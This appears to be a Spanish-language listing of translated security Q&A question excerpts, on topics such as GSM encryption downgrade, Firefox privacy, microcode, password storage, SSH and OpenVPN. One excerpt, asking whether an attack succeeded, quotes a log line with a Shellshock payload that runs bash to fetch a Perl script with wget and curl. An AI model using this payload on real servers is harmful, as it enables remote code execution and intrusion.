Todas las preguntas

1
respuesta

supresión de cifrado GSM

Los siguientes documentos explican que es posible suprimir el cifrado (o degradación) en GSM mediante mensajes falsos: enlace enlace El problema principal parece ser que los mensajes, que se utilizan para determinar qué protocolos d...
pregunta 13.04.2017 - 08:55
1
respuesta

Privacidad y fuentes de Firefox 52

Tengo entendido que Firefox 52 debía incluir características que aumentaran la privacidad al navegar por la web. Específicamente, iba a incluir una característica que limita el número de fuentes del sistema que se pueden ver a terceros (a través...
pregunta 09.03.2017 - 17:25
1
respuesta

Evidencia de Shellshock Exploit: ¿es este un ataque exitoso?

Estuve revisando los registros hoy y noté lo siguiente: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/b...
pregunta 27.12.2016 - 01:36
2
respuestas

¿Capacidad de pirateo de microcódigo?

Antes de Specter y Meltdown, nunca he oído hablar de usuarios que actualicen microcódigo en un chip a través del firmware o de otra manera. En realidad pensé que estaba escrito en el silicio e inmutable. Ahora estoy viendo un montón de mencione...
pregunta 07.01.2018 - 21:50
2
respuestas

¿Cómo puedo saber si un archivo zip utiliza el exploit 7-Zip?

Digamos que tengo un archivo zip "dañado" de una fuente potencialmente sospechosa, y que al menos una persona ha intentado extraerlo. La sabiduría convencional se usaba para ser algo tan malo ™ que no ocurría al descomprimir un archivo, pero...
pregunta 29.06.2016 - 19:08
2
respuestas

¿Cómo separar los datos confidenciales de almacenamiento y las contraseñas de hash?

Escenario: Tengo una aplicación web con un sistema de autenticación (clásico). La aplicación es básicamente una interfaz para una base de datos (MongoDB) que contiene datos confidenciales. Heblo correctamente las contraseñas almacenadas. Asum...
pregunta 22.09.2017 - 14:29
3
respuestas

Caducidad / imposición del cambio de frase de contraseña para claves privadas ssh

Por curiosidad, y también para comprobar si esto es factible: ¿Hay alguna forma de utilizar herramientas estándar para asignar una fecha de caducidad [solo] a la frase de contraseña de una clave privada ssh, o para imponer la caducidad y el c...
pregunta 07.09.2014 - 14:24
1
respuesta

OpenVPN -cipher vs -tls-cipher?

Actualmente estoy usando el comando -tls-cipher en el servidor para permitir solo el cifrado que quiero ( TLS-DHE-RSA-WITH-AES-256-GCM-SHA384 ) pero también está el comando -cipher , y la página de manual de OpenVPN no está re...
pregunta 29.06.2015 - 06:20
3
respuestas

¿Está bien tener certificados autofirmados en el control de origen?

Acabo de hacer la pregunta Certificados autofirmados SSL en desarrollo vs certificado adquirido en producción? que ha sido respondido rápidamente (¡GRACIAS!). Fuera de eso, tengo la siguiente pregunta: ¿Es correcto tener mis certi...
pregunta 26.01.2016 - 22:36
1
respuesta

¿Qué dice el teléfono de Obama sobre Android y el hardware del teléfono?

El artículo reciente Goodbye Obamaberry, hola Obamadroid describe la decisión de mueve el teléfono de Obama de la Blackberry al Samsung Galaxy S4. El Galaxy 4S es, por supuesto, un teléfono antiguo y extranjero. Como profesional de la segur...
pregunta 26.06.2016 - 21:57